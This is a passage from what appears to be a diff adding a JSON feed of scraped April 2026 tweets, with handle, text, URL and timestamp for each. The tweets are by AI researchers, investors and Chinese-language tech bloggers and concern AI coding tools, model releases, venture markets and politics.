"2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 🧵 THREAD\n\n1/ Online age verification is the hill to die on.\n\nNot a fight you can sit out. Not a battle you can skip. Not a policy you can afford to ignore while you focus on something else.\n\nThis is it. This is the line. This is the infrastructure that enables every other piece of the digital control grid.\n\nIf we lose this fight, we lose everything.", + "url": "https://x.com/paulg/status/2049088498163216560", + "published_at": "2026-04-28T11:29:02+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": 